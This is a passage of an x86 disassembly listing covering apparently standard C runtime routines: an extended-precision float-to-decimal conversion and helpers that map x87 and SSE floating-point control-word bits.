		cmp	[ebp-1Ch], esi
		jnz	short loc_4132F4
		cmp	[ebp+var_20], esi
		jnz	short loc_4132F4
		mov	word ptr [ebp+var_16], si
		jmp	loc_4134C6
; ---------------------------------------------------------------------------

loc_4132F4:				; CODE XREF: sub_413071+264j
					; sub_413071+26Ej ...
		cmp	di, si
		jnz	short loc_41331D
		mov	edx, [ebp+var_64]
		inc	eax
		test	dword ptr [edx+8], 7FFFFFFFh
		jnz	short loc_41331D
		cmp	[edx+4], esi
		jnz	short loc_41331D
		cmp	[edx], esi
		jnz	short loc_41331D
		mov	[ebp+var_1A+2],	esi
		mov	[ebp-1Ch], esi
		mov	[ebp+var_20], esi
		jmp	loc_4134C6
; ---------------------------------------------------------------------------

loc_41331D:				; CODE XREF: sub_413071+286j
					; sub_413071+293j ...
		lea	edi, [ebp+var_C]
		mov	[ebp+var_5C], esi
		mov	[ebp+var_44], edi
		mov	[ebp+var_40], 5

loc_41332D:				; CODE XREF: sub_413071+332j
		mov	edx, [ebp+var_5C]
		mov	esi, [ebp+var_40]
		add	edx, edx
		test	esi, esi
		mov	[ebp+var_50], esi
		jle	short loc_413394
		lea	edx, [ebp+edx+var_20]
		mov	[ebp+var_58], edx
		mov	edx, [ebp+var_64]
		add	edx, 8
		mov	[ebp+var_54], edx

loc_41334C:				; CODE XREF: sub_413071+321j
		mov	edx, [ebp+var_58]
		mov	esi, [ebp+var_54]
		movzx	esi, word ptr [esi]
		movzx	edx, word ptr [edx]
		mov	edi, [edi-4]
		imul	edx, esi
		and	[ebp+var_70], 0
		lea	esi, [edi+edx]
		cmp	esi, edi
		jb	short loc_41336D
		cmp	esi, edx
		jnb	short loc_413374

loc_41336D:				; CODE XREF: sub_413071+2F6j
		mov	[ebp+var_70], 1

loc_413374:				; CODE XREF: sub_413071+2FAj
		cmp	[ebp+var_70], 0
		mov	edi, [ebp+var_44]
		mov	[edi-4], esi
		jz	short loc_413383
		inc	word ptr [edi]

loc_413383:				; CODE XREF: sub_413071+30Dj
		add	[ebp+var_58], 2
		sub	[ebp+var_54], 2
		dec	[ebp+var_50]
		cmp	[ebp+var_50], 0
		jg	short loc_41334C

loc_413394:				; CODE XREF: sub_413071+2C9j
		inc	edi
		inc	edi
		inc	[ebp+var_5C]
		dec	[ebp+var_40]
		cmp	[ebp+var_40], 0
		mov	[ebp+var_44], edi
		jg	short loc_41332D
		add	eax, 0C002h
		test	ax, ax
		jle	short loc_4133EA

loc_4133AF:				; CODE XREF: sub_413071+372j
		test	[ebp+var_8], 80000000h
		jnz	short loc_4133E5
		mov	edx, [ebp+var_10]
		mov	edi, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shl	[ebp+var_10], 1
		shr	edx, 1Fh
		add	edi, edi
		or	edi, edx
		mov	edx, [ebp+var_8]
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		add	eax, 0FFFFh
		test	ax, ax
		mov	[ebp+var_C], edi
		mov	[ebp+var_8], edx
		jg	short loc_4133AF

loc_4133E5:				; CODE XREF: sub_413071+345j
		test	ax, ax
		jg	short loc_41343C

loc_4133EA:				; CODE XREF: sub_413071+33Cj
		add	eax, 0FFFFh
		test	ax, ax
		jge	short loc_41343C
		mov	edx, eax
		neg	edx
		movzx	edx, dx
		mov	[ebp+var_44], edx
		add	eax, edx

loc_413400:				; CODE XREF: sub_413071+3BEj
		test	byte ptr [ebp+var_10], 1
		jz	short loc_413409
		inc	[ebp+var_48]

loc_413409:				; CODE XREF: sub_413071+393j
		mov	edx, [ebp+var_8]
		mov	edi, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shr	[ebp+var_8], 1
		shl	edx, 1Fh
		shr	edi, 1
		or	edi, edx
		mov	edx, [ebp+var_10]
		shl	esi, 1Fh
		shr	edx, 1
		or	edx, esi
		dec	[ebp+var_44]
		mov	[ebp+var_C], edi
		mov	[ebp+var_10], edx
		jnz	short loc_413400
		cmp	[ebp+var_48], 0
		jz	short loc_41343C
		or	word ptr [ebp+var_10], 1

loc_41343C:				; CODE XREF: sub_413071+377j
					; sub_413071+381j ...
		cmp	word ptr [ebp+var_10], 8000h
		ja	short loc_413455
		mov	edx, [ebp+var_10]
		and	edx, 1FFFFh
		cmp	edx, 18000h
		jnz	short loc_413488

loc_413455:				; CODE XREF: sub_413071+3D1j
		cmp	[ebp+var_10+2],	0FFFFFFFFh
		jnz	short loc_413485
		and	[ebp+var_10+2],	0
		cmp	[ebp+var_C+2], 0FFFFFFFFh
		jnz	short loc_413480
		and	[ebp+var_C+2], 0
		cmp	word ptr [ebp+var_8+2],	0FFFFh
		jnz	short loc_41347A
		mov	word ptr [ebp+var_8+2],	8000h
		inc	eax
		jmp	short loc_413488
; ---------------------------------------------------------------------------

loc_41347A:				; CODE XREF: sub_413071+3FEj
		inc	word ptr [ebp+var_8+2]
		jmp	short loc_413488
; ---------------------------------------------------------------------------

loc_413480:				; CODE XREF: sub_413071+3F2j
		inc	[ebp+var_C+2]
		jmp	short loc_413488
; ---------------------------------------------------------------------------

loc_413485:				; CODE XREF: sub_413071+3E8j
		inc	[ebp+var_10+2]

loc_413488:				; CODE XREF: sub_413071+3E2j
					; sub_413071+407j ...
		cmp	ax, 7FFFh
		jnb	short loc_4134AA
		mov	dx, word ptr [ebp+var_10+2]
		mov	word ptr [ebp+var_20], dx
		mov	edx, [ebp+var_C]
		mov	[ebp+var_20+2],	edx
		mov	edx, [ebp+var_8]
		or	eax, ecx
		mov	[ebp+var_1A], edx
		mov	word ptr [ebp+var_16], ax
		jmp	short loc_4134C6
; ---------------------------------------------------------------------------

loc_4134AA:				; CODE XREF: sub_413071+230j
					; sub_413071+239j ...
		neg	cx
		sbb	ecx, ecx
		and	dword ptr [ebp-1Ch], 0
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		and	[ebp+var_20], 0
		mov	[ebp+var_1A+2],	ecx

loc_4134C6:				; CODE XREF: sub_413071+1D6j
					; sub_413071+25Aj ...
		test	ebx, ebx
		jnz	loc_413239
		xor	eax, eax

loc_4134D0:				; CODE XREF: sub_413071+1ABj
					; sub_413071+1C2j
		mov	ecx, [ebp+var_1A+2]
		shr	ecx, 10h
		cmp	cx, 3FFFh
		mov	ebx, 7FFFh
		jb	loc_413730
		mov	esi, [ebp+var_28+2]
		inc	[ebp+var_4C]
		movzx	edx, cx
		mov	ecx, esi
		xor	ecx, edx
		and	edx, ebx
		and	esi, ebx
		and	ecx, 8000h
		cmp	dx, bx
		lea	edi, [esi+edx]
		mov	[ebp+var_58], eax
		mov	[ebp+var_10], eax
		mov	[ebp+var_C], eax
		mov	[ebp+var_8], eax
		movzx	edi, di
		jnb	loc_413716
		cmp	si, bx
		jnb	loc_413716
		cmp	di, 0BFFDh
		ja	loc_413716
		cmp	di, 3FBFh
		ja	short loc_41353B

loc_413533:				; CODE XREF: sub_413071+503j
		mov	[ebp+var_1A+2],	eax
		jmp	loc_41372A
; ---------------------------------------------------------------------------

loc_41353B:				; CODE XREF: sub_413071+4C0j
		cmp	dx, ax
		jnz	short loc_41355D
		inc	edi
		test	[ebp+var_1A+2],	7FFFFFFFh
		jnz	short loc_41355D
		cmp	[ebp-1Ch], eax
		jnz	short loc_41355D
		cmp	[ebp+var_20], eax
		jnz	short loc_41355D
		mov	word ptr [ebp+var_16], ax
		jmp	loc_413730
; ---------------------------------------------------------------------------

loc_41355D:				; CODE XREF: sub_413071+4CDj
					; sub_413071+4D7j ...
		cmp	si, ax
		jnz	short loc_413576
		inc	edi
		test	[ebp+var_28], 7FFFFFFFh
		jnz	short loc_413576
		cmp	[ebp+var_2C], eax
		jnz	short loc_413576
		cmp	[ebp+var_30], eax
		jz	short loc_413533

loc_413576:				; CODE XREF: sub_413071+4EFj
					; sub_413071+4F9j ...
		and	[ebp+var_54], 0
		lea	eax, [ebp+var_C]
		mov	[ebp+var_40], 5

loc_413584:				; CODE XREF: sub_413071+580j
		mov	edx, [ebp+var_54]
		mov	esi, [ebp+var_40]
		add	edx, edx
		test	esi, esi
		mov	[ebp+var_50], esi
		jle	short loc_4135E5
		lea	esi, [ebp+var_28]
		lea	edx, [ebp+edx+var_20]
		mov	[ebp+var_5C], esi
		mov	[ebp+var_48], edx

loc_4135A0:				; CODE XREF: sub_413071+572j
		mov	edx, [ebp+var_5C]
		mov	esi, [ebp+var_48]
		movzx	esi, word ptr [esi]
		movzx	edx, word ptr [edx]
		and	[ebp+var_44], 0
		imul	edx, esi
		mov	esi, [eax-4]
		lea	ebx, [esi+edx]
		cmp	ebx, esi
		jb	short loc_4135C1
		cmp	ebx, edx
		jnb	short loc_4135C8

loc_4135C1:				; CODE XREF: sub_413071+54Aj
		mov	[ebp+var_44], 1

loc_4135C8:				; CODE XREF: sub_413071+54Ej
		cmp	[ebp+var_44], 0
		mov	[eax-4], ebx
		jz	short loc_4135D4
		inc	word ptr [eax]

loc_4135D4:				; CODE XREF: sub_413071+55Ej
		add	[ebp+var_48], 2
		sub	[ebp+var_5C], 2
		dec	[ebp+var_50]
		cmp	[ebp+var_50], 0
		jg	short loc_4135A0

loc_4135E5:				; CODE XREF: sub_413071+520j
		inc	eax
		inc	eax
		inc	[ebp+var_54]
		dec	[ebp+var_40]
		cmp	[ebp+var_40], 0
		jg	short loc_413584
		add	edi, 0C002h
		xor	eax, eax
		cmp	di, ax
		jle	short loc_41363C

loc_413600:				; CODE XREF: sub_413071+5C4j
		test	[ebp+var_8], 80000000h
		jnz	short loc_413637
		mov	edx, [ebp+var_10]
		mov	ebx, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shl	[ebp+var_10], 1
		shr	edx, 1Fh
		add	ebx, ebx
		or	ebx, edx
		mov	edx, [ebp+var_8]
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		add	edi, 0FFFFh
		cmp	di, ax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_8], edx
		jg	short loc_413600

loc_413637:				; CODE XREF: sub_413071+596j
		cmp	di, ax
		jg	short loc_41368B

loc_41363C:				; CODE XREF: sub_413071+58Dj
		add	edi, 0FFFFh
		cmp	di, ax
		jge	short loc_41368B
		mov	eax, edi
		neg	eax
		movzx	eax, ax
		add	edi, eax

loc_413650:				; CODE XREF: sub_413071+60Cj
		test	byte ptr [ebp+var_10], 1
		jz	short loc_413659
		inc	[ebp+var_58]

loc_413659:				; CODE XREF: sub_413071+5E3j
		mov	edx, [ebp+var_8]
		mov	ebx, [ebp+var_C]
		mov	esi, [ebp+var_C]
		shr	[ebp+var_8], 1
		shl	edx, 1Fh
		shr	ebx, 1
		or	ebx, edx
		mov	edx, [ebp+var_10]
		shl	esi, 1Fh
		shr	edx, 1
		or	edx, esi
		dec	eax
		mov	[ebp+var_C], ebx
		mov	[ebp+var_10], edx
		jnz	short loc_413650
		xor	eax, eax
		cmp	[ebp+var_58], eax
		jz	short loc_41368B
		or	word ptr [ebp+var_10], 1

loc_41368B:				; CODE XREF: sub_413071+5C9j
					; sub_413071+5D4j ...
		cmp	word ptr [ebp+var_10], 8000h
		ja	short loc_4136A4
		mov	edx, [ebp+var_10]
		and	edx, 1FFFFh
		cmp	edx, 18000h
		jnz	short loc_4136D5

loc_4136A4:				; CODE XREF: sub_413071+620j
		cmp	[ebp+var_10+2],	0FFFFFFFFh
		jnz	short loc_4136D2
		cmp	[ebp+var_C+2], 0FFFFFFFFh
		mov	[ebp+var_10+2],	eax
		jnz	short loc_4136CD
		cmp	word ptr [ebp+var_8+2],	0FFFFh
		mov	[ebp+var_C+2], eax
		jnz	short loc_4136C7
		mov	word ptr [ebp+var_8+2],	8000h
		inc	edi
		jmp	short loc_4136D5
; ---------------------------------------------------------------------------

loc_4136C7:				; CODE XREF: sub_413071+64Bj
		inc	word ptr [ebp+var_8+2]
		jmp	short loc_4136D5
; ---------------------------------------------------------------------------

loc_4136CD:				; CODE XREF: sub_413071+640j
		inc	[ebp+var_C+2]
		jmp	short loc_4136D5
; ---------------------------------------------------------------------------

loc_4136D2:				; CODE XREF: sub_413071+637j
		inc	[ebp+var_10+2]

loc_4136D5:				; CODE XREF: sub_413071+631j
					; sub_413071+654j ...
		cmp	di, 7FFFh
		jb	short loc_4136FA
		neg	cx
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax
		sbb	ecx, ecx
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		mov	[ebp+var_1A+2],	ecx

loc_4136F6:				; CODE XREF: sub_413071+6A3j
		xor	eax, eax
		jmp	short loc_413730
; ---------------------------------------------------------------------------

loc_4136FA:				; CODE XREF: sub_413071+669j
		mov	ax, word ptr [ebp+var_10+2]
		mov	word ptr [ebp+var_20], ax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_20+2],	eax
		mov	eax, [ebp+var_8]
		or	edi, ecx
		mov	[ebp+var_1A], eax
		mov	word ptr [ebp+var_16], di
		jmp	short loc_4136F6
; ---------------------------------------------------------------------------

loc_413716:				; CODE XREF: sub_413071+4A1j
					; sub_413071+4AAj ...
		neg	cx
		sbb	ecx, ecx
		and	ecx, 80000000h
		add	ecx, 7FFF8000h
		mov	[ebp+var_1A+2],	ecx

loc_41372A:				; CODE XREF: sub_413071+4C5j
		mov	[ebp-1Ch], eax
		mov	[ebp+var_20], eax

loc_413730:				; CODE XREF: sub_413071+46Fj
					; sub_413071+4E7j ...
		test	[ebp+arg_10], 1
		mov	edx, [ebp+var_60]
		mov	ecx, [ebp+var_4C]
		mov	[edx], cx
		jz	short loc_413771
		movsx	ecx, cx
		add	[ebp+arg_C], ecx
		cmp	[ebp+arg_C], eax
		jg	short loc_413771
		and	word ptr [edx],	0
		cmp	word ptr [ebp+var_6C], 8000h
		mov	byte ptr [edx+3], 1
		setnz	al
		dec	al
		and	al, 0Dh
		add	al, 20h
		mov	[edx+2], al
		mov	byte ptr [edx+4], 30h
		mov	byte ptr [edx+5], 0
		jmp	loc_413120
; ---------------------------------------------------------------------------

loc_413771:				; CODE XREF: sub_413071+6CCj
					; sub_413071+6D7j
		push	15h
		pop	ecx
		cmp	[ebp+arg_C], ecx
		jle	short loc_41377C
		mov	[ebp+arg_C], ecx

loc_41377C:				; CODE XREF: sub_413071+706j
		mov	esi, [ebp+var_1A+2]
		shr	esi, 10h
		push	8
		sub	esi, 3FFEh
		mov	word ptr [ebp+var_16], ax
		pop	ebx

loc_41378F:				; CODE XREF: sub_413071+742j
		mov	eax, [ebp+var_20]
		mov	edi, [ebp-1Ch]
		mov	ecx, [ebp-1Ch]
		shl	[ebp+var_20], 1
		shr	eax, 1Fh
		add	edi, edi
		or	edi, eax
		mov	eax, [ebp+var_1A+2]
		shr	ecx, 1Fh
		add	eax, eax
		or	eax, ecx
		dec	ebx
		mov	[ebp-1Ch], edi
		mov	[ebp+var_1A+2],	eax
		jnz	short loc_41378F
		test	esi, esi
		jge	short loc_4137EB
		neg	esi
		and	esi, 0FFh
		jle	short loc_4137EB

loc_4137C3:				; CODE XREF: sub_413071+778j
		mov	eax, [ebp+var_1A+2]
		mov	edi, [ebp-1Ch]
		mov	ecx, [ebp-1Ch]
		shr	[ebp+var_1A+2],	1
		shl	eax, 1Fh
		shr	edi, 1
		or	edi, eax
		mov	eax, [ebp+var_20]
		shl	ecx, 1Fh
		shr	eax, 1
		or	eax, ecx
		dec	esi
		test	esi, esi
		mov	[ebp-1Ch], edi
		mov	[ebp+var_20], eax
		jg	short loc_4137C3

loc_4137EB:				; CODE XREF: sub_413071+746j
					; sub_413071+750j
		mov	eax, [ebp+arg_C]
		inc	eax
		test	eax, eax
		lea	ebx, [edx+4]
		mov	[ebp+var_40], ebx
		mov	[ebp+var_4C], eax
		jle	loc_4138B5

loc_413800:				; CODE XREF: sub_413071+83Ej
		mov	edx, [ebp+var_20]
		mov	eax, [ebp-1Ch]
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_3C]
		movsd
		movsd
		movsd
		shl	[ebp+var_20], 1
		mov	edi, [ebp+var_20]
		shl	[ebp+var_20], 1
		shr	edx, 1Fh
		lea	ecx, [eax+eax]
		or	ecx, edx
		mov	edx, [ebp+var_1A+2]
		mov	esi, eax
		shr	esi, 1Fh
		add	edx, edx
		or	edx, esi
		mov	eax, ecx
		lea	esi, [ecx+ecx]
		shr	eax, 1Fh
		lea	ecx, [edx+edx]
		mov	edx, [ebp+var_3C]
		shr	edi, 1Fh
		or	ecx, eax
		mov	eax, [ebp+var_20]
		or	esi, edi
		lea	edi, [edx+eax]
		cmp	edi, eax
		jb	short loc_41384F
		cmp	edi, edx
		jnb	short loc_413867

loc_41384F:				; CODE XREF: sub_413071+7D8j
		lea	eax, [esi+1]
		xor	edx, edx
		cmp	eax, esi
		jb	short loc_41385D
		cmp	eax, 1
		jnb	short loc_413860

loc_41385D:				; CODE XREF: sub_413071+7E5j
		xor	edx, edx
		inc	edx

loc_413860:				; CODE XREF: sub_413071+7EAj
		test	edx, edx
		mov	esi, eax
		jz	short loc_413867
		inc	ecx

loc_413867:				; CODE XREF: sub_413071+7DCj
					; sub_413071+7F3j
		mov	eax, [ebp+var_38]
		lea	edx, [eax+esi]
		cmp	edx, esi
		mov	[ebp+var_44], edx
		jb	short loc_413878
		cmp	edx, eax
		jnb	short loc_413879

loc_413878:				; CODE XREF: sub_413071+801j
		inc	ecx

loc_413879:				; CODE XREF: sub_413071+805j
		add	ecx, [ebp+var_34]
		shr	edx, 1Fh
		add	ecx, ecx
		or	ecx, edx
		lea	esi, [edi+edi]
		mov	[ebp+var_20], esi
		mov	esi, [ebp+var_44]
		mov	[ebp+var_1A+2],	ecx
		shr	ecx, 18h
		add	esi, esi
		add	cl, 30h
		mov	eax, edi
		shr	eax, 1Fh
		or	esi, eax
		mov	[ebx], cl
		inc	ebx
		dec	[ebp+var_4C]
		cmp	[ebp+var_4C], 0
		mov	[ebp-1Ch], esi
		mov	byte ptr [ebp+var_16+1], 0
		jg	loc_413800

loc_4138B5:				; CODE XREF: sub_413071+789j
		dec	ebx
		mov	al, [ebx]
		dec	ebx
		cmp	al, 35h
		jge	short loc_4138CB
		mov	ecx, [ebp+var_40]
		jmp	short loc_413906
; ---------------------------------------------------------------------------

loc_4138C2:				; CODE XREF: sub_413071+85Dj
		cmp	byte ptr [ebx],	39h
		jnz	short loc_4138D0
		mov	byte ptr [ebx],	30h
		dec	ebx

loc_4138CB:				; CODE XREF: sub_413071+84Aj
		cmp	ebx, [ebp+var_40]
		jnb	short loc_4138C2

loc_4138D0:				; CODE XREF: sub_413071+854j
		cmp	ebx, [ebp+var_40]
		mov	eax, [ebp+var_60]
		jnb	short loc_4138DC
		inc	ebx
		inc	word ptr [eax]

loc_4138DC:				; CODE XREF: sub_413071+865j
		inc	byte ptr [ebx]

loc_4138DE:				; CODE XREF: sub_413071+89Ej
		sub	bl, al
		sub	bl, 3
		movsx	ecx, bl
		mov	[eax+3], bl
		mov	byte ptr [ecx+eax+4], 0
		mov	eax, [ebp+var_74]

loc_4138F1:				; CODE XREF: sub_413071+B2j
					; sub_413071+15Bj
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
; ---------------------------------------------------------------------------

loc_413900:				; CODE XREF: sub_413071+897j
		cmp	byte ptr [ebx],	30h
		jnz	short loc_41390A
		dec	ebx

loc_413906:				; CODE XREF: sub_413071+84Fj
		cmp	ebx, ecx
		jnb	short loc_413900

loc_41390A:				; CODE XREF: sub_413071+892j
		cmp	ebx, ecx
		mov	eax, [ebp+var_60]
		jnb	short loc_4138DE
		and	word ptr [eax],	0
		cmp	word ptr [ebp+var_6C], 8000h
		mov	byte ptr [eax+3], 1
		setnz	dl
		dec	dl
		and	dl, 0Dh
		add	dl, 20h
		mov	[eax+2], dl
		mov	byte ptr [ecx],	30h
		mov	byte ptr [eax+5], 0
		jmp	loc_413120
sub_413071	endp


; =============== S U B	R O U T	I N E =======================================



sub_413939	proc near		; CODE XREF: sub_413A67+C0p
		xor	eax, eax
		test	bl, 10h
		jz	short loc_413941
		inc	eax

loc_413941:				; CODE XREF: sub_413939+5j
		test	bl, 8
		jz	short loc_413949
		or	eax, 4

loc_413949:				; CODE XREF: sub_413939+Bj
		test	bl, 4
		jz	short loc_413951
		or	eax, 8

loc_413951:				; CODE XREF: sub_413939+13j
		test	bl, 2
		jz	short loc_413959
		or	eax, 10h

loc_413959:				; CODE XREF: sub_413939+1Bj
		test	bl, 1
		jz	short loc_413961
		or	eax, 20h

loc_413961:				; CODE XREF: sub_413939+23j
		test	ebx, 80000h
		jz	short loc_41396C
		or	eax, 2

loc_41396C:				; CODE XREF: sub_413939+2Ej
		mov	ecx, ebx
		mov	edx, 300h
		and	ecx, edx
		push	esi
		mov	esi, 200h
		jz	short loc_4139A0
		cmp	ecx, 100h
		jz	short loc_41399B
		cmp	ecx, esi
		jz	short loc_413994
		cmp	ecx, edx
		jnz	short loc_4139A0
		or	eax, 0C00h
		jmp	short loc_4139A0
; ---------------------------------------------------------------------------

loc_413994:				; CODE XREF: sub_413939+4Ej
		or	eax, 800h
		jmp	short loc_4139A0
; ---------------------------------------------------------------------------

loc_41399B:				; CODE XREF: sub_413939+4Aj
		or	eax, 400h

loc_4139A0:				; CODE XREF: sub_413939+42j
					; sub_413939+52j ...
		mov	ecx, ebx
		and	ecx, 30000h
		jz	short loc_4139B6
		cmp	ecx, 10000h
		jnz	short loc_4139B8
		or	eax, esi
		jmp	short loc_4139B8
; ---------------------------------------------------------------------------

loc_4139B6:				; CODE XREF: sub_413939+6Fj
		or	eax, edx

loc_4139B8:				; CODE XREF: sub_413939+77j
					; sub_413939+7Bj
		test	ebx, 40000h
		pop	esi
		jz	short locret_4139C6
		or	eax, 1000h

locret_4139C6:				; CODE XREF: sub_413939+86j
		retn
sub_413939	endp


; =============== S U B	R O U T	I N E =======================================



sub_4139C7	proc near		; CODE XREF: sub_413A67:loc_413CA0p
		xor	eax, eax
		test	dl, 10h
		jz	short loc_4139D3
		mov	eax, 80h

loc_4139D3:				; CODE XREF: sub_4139C7+5j
		test	dl, 8
		push	ebx
		push	esi
		push	edi
		mov	ebx, 200h
		jz	short loc_4139E2
		or	eax, ebx

loc_4139E2:				; CODE XREF: sub_4139C7+17j
		test	dl, 4
		jz	short loc_4139EC
		or	eax, 400h

loc_4139EC:				; CODE XREF: sub_4139C7+1Ej
		test	dl, 2
		jz	short loc_4139F6
		or	eax, 800h

loc_4139F6:				; CODE XREF: sub_4139C7+28j
		test	dl, 1
		jz	short loc_413A00
		or	eax, 1000h

loc_413A00:				; CODE XREF: sub_4139C7+32j
		test	edx, 80000h
		mov	edi, 100h
		jz	short loc_413A0F
		or	eax, edi

loc_413A0F:				; CODE XREF: sub_4139C7+44j
		mov	ecx, edx
		mov	esi, 300h
		and	ecx, esi
		jz	short loc_413A39
		cmp	ecx, edi
		jz	short loc_413A34
		cmp	ecx, ebx
		jz	short loc_413A2D
		cmp	ecx, esi
		jnz	short loc_413A39
		or	eax, 6000h
		jmp	short loc_413A39
; ---------------------------------------------------------------------------

loc_413A2D:				; CODE XREF: sub_4139C7+59j
		or	eax, 4000h
		jmp	short loc_413A39
; ---------------------------------------------------------------------------

loc_413A34:				; CODE XREF: sub_4139C7+55j
		or	eax, 2000h

loc_413A39:				; CODE XREF: sub_4139C7+51j
					; sub_4139C7+5Dj ...
		mov	ecx, 3000000h
		pop	edi
		and	edx, ecx
		cmp	edx, 1000000h
		pop	esi
		pop	ebx
		jz	short loc_413A61
		cmp	edx, 2000000h
		jz	short loc_413A5D
		cmp	edx, ecx
		jnz	short locret_413A66
		or	eax, 8000h
		retn
; ---------------------------------------------------------------------------

loc_413A5D:				; CODE XREF: sub_4139C7+8Aj
		or	eax, 40h
		retn
; ---------------------------------------------------------------------------

loc_413A61:				; CODE XREF: sub_4139C7+82j
		or	eax, 8040h

locret_413A66:				; CODE XREF: sub_4139C7+8Ej
		retn
sub_4139C7	endp


; =============== S U B	R O U T	I N E =======================================



sub_413A67	proc near		; CODE XREF: sub_411EBF+25p
					; sub_411EBF+55p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		sub	esp, 10h
		push	ebx
		push	ebp
		push	esi
		push	edi
		fstcw	word ptr [esp+20h+var_C]
		mov	ebx, [esp+20h+var_C]
		xor	edx, edx
		test	bl, 1
		jz	short loc_413A81
		push	10h
		pop	edx

loc_413A81:				; CODE XREF: sub_413A67+15j
		test	bl, 4
		jz	short loc_413A89
		or	edx, 8

loc_413A89:				; CODE XREF: sub_413A67+1Dj
		test	bl, 8
		jz	short loc_413A91
		or	edx, 4

loc_413A91:				; CODE XREF: sub_413A67+25j
		test	bl, 10h
		jz	short loc_413A99
		or	edx, 2

loc_413A99:				; CODE XREF: sub_413A67+2Dj
		test	bl, 20h
		jz	short loc_413AA1
		or	edx, 1

loc_413AA1:				; CODE XREF: sub_413A67+35j
		test	bl, 2
		jz	short loc_413AAC
		or	edx, 80000h

loc_413AAC:				; CODE XREF: sub_413A67+3Dj
		movzx	ecx, bx
		mov	eax, ecx
		mov	edi, 0C00h
		and	eax, edi
		mov	ebp, 300h
		mov	esi, 200h
		jz	short loc_413AE4
		cmp	eax, 400h
		jz	short loc_413ADE
		cmp	eax, 800h
		jz	short loc_413ADA
		cmp	eax, edi
		jnz	short loc_413AE4
		or	edx, ebp
		jmp	short loc_413AE4
; ---------------------------------------------------------------------------

loc_413ADA:				; CODE XREF: sub_413A67+69j
		or	edx, esi
		jmp	short loc_413AE4
; ---------------------------------------------------------------------------

loc_413ADE:				; CODE XREF: sub_413A67+62j
		or	edx, 100h

loc_413AE4:				; CODE XREF: sub_413A67+5Bj
					; sub_413A67+6Dj ...
		and	ecx, ebp
		jz	short loc_413AF4
		cmp	ecx, esi
		jnz	short loc_413AFA
		or	edx, 10000h
		jmp	short loc_413AFA
; ---------------------------------------------------------------------------

loc_413AF4:				; CODE XREF: sub_413A67+7Fj
		or	edx, 20000h

loc_413AFA:				; CODE XREF: sub_413A67+83j
					; sub_413A67+8Bj
		test	bx, 1000h
		jz	short loc_413B07
		or	edx, 40000h

loc_413B07:				; CODE XREF: sub_413A67+98j
		mov	esi, [esp+20h+arg_4]
		mov	ecx, [esp+20h+arg_0]
		mov	eax, esi
		not	eax
		and	eax, edx
		and	ecx, esi
		or	eax, ecx
		cmp	eax, edx
		mov	[esp+20h+var_4], eax
		jz	loc_413BCF
		mov	ebx, eax
		call	sub_413939
		movzx	eax, ax
		mov	[esp+20h+var_10], eax
		fldcw	word ptr [esp+20h+var_10]
		fstcw	word ptr [esp+20h+var_10]
		mov	ebx, [esp+20h+var_10]
		xor	edx, edx
		test	bl, 1
		jz	short loc_413B4A
		push	10h
		pop	edx

loc_413B4A:				; CODE XREF: sub_413A67+DEj
		test	bl, 4
		jz	short loc_413B52
		or	edx, 8

loc_413B52:				; CODE XREF: sub_413A67+E6j
		test	bl, 8
		jz	short loc_413B5A
		or	edx, 4

loc_413B5A:				; CODE XREF: sub_413A67+EEj
		test	bl, 10h
		jz	short loc_413B62
		or	edx, 2

loc_413B62:				; CODE XREF: sub_413A67+F6j
		test	bl, 20h
		jz	short loc_413B6A
		or	edx, 1

loc_413B6A:				; CODE XREF: sub_413A67+FEj
		test	bl, 2
		jz	short loc_413B75
		or	edx, 80000h

loc_413B75:				; CODE XREF: sub_413A67+106j
		movzx	ecx, bx
		mov	eax, ecx
		and	eax, edi
		jz	short loc_413BA2
		cmp	eax, 400h
		jz	short loc_413B9C
		cmp	eax, 800h
		jz	short loc_413B94
		cmp	eax, edi
		jnz	short loc_413BA2
		or	edx, ebp
		jmp	short loc_413BA2
; ---------------------------------------------------------------------------

loc_413B94:				; CODE XREF: sub_413A67+123j
		or	edx, 200h
		jmp	short loc_413BA2
; ---------------------------------------------------------------------------

loc_413B9C:				; CODE XREF: sub_413A67+11Cj
		or	edx, 100h

loc_413BA2:				; CODE XREF: sub_413A67+115j
					; sub_413A67+127j ...
		and	ecx, ebp
		jz	short loc_413BB6
		cmp	ecx, 200h
		jnz	short loc_413BBC
		or	edx, 10000h
		jmp	short loc_413BBC
; ---------------------------------------------------------------------------

loc_413BB6:				; CODE XREF: sub_413A67+13Dj
		or	edx, 20000h

loc_413BBC:				; CODE XREF: sub_413A67+145j
					; sub_413A67+14Dj
		test	bx, 1000h
		jz	short loc_413BC9
		or	edx, 40000h

loc_413BC9:				; CODE XREF: sub_413A67+15Aj
		mov	eax, edx
		mov	[esp+20h+var_4], edx

loc_413BCF:				; CODE XREF: sub_413A67+B8j
		cmp	dword_437E9C, 0
		jz	loc_413D62
		and	esi, 308031Fh
		mov	edi, esi
		stmxcsr	[esp+20h+var_8]
		mov	eax, [esp+20h+var_8]
		xor	esi, esi
		test	al, al
		jns	short loc_413BF6
		push	10h
		pop	esi

loc_413BF6:				; CODE XREF: sub_413A67+18Aj
		test	ax, 200h
		jz	short loc_413BFF
		or	esi, 8

loc_413BFF:				; CODE XREF: sub_413A67+193j
		test	ax, 400h
		jz	short loc_413C08
		or	esi, 4

loc_413C08:				; CODE XREF: sub_413A67+19Cj
		test	ax, 800h
		jz	short loc_413C11
		or	esi, 2

loc_413C11:				; CODE XREF: sub_413A67+1A5j
		test	ax, 1000h
		jz	short loc_413C1A
		or	esi, 1

loc_413C1A:				; CODE XREF: sub_413A67+1AEj
		test	ax, 100h
		jz	short loc_413C26
		or	esi, 80000h

loc_413C26:				; CODE XREF: sub_413A67+1B7j
		mov	ecx, eax
		mov	ebp, 6000h
		and	ecx, ebp
		jz	short loc_413C5B
		cmp	ecx, 2000h
		jz	short loc_413C55
		cmp	ecx, 4000h
		jz	short loc_413C4D
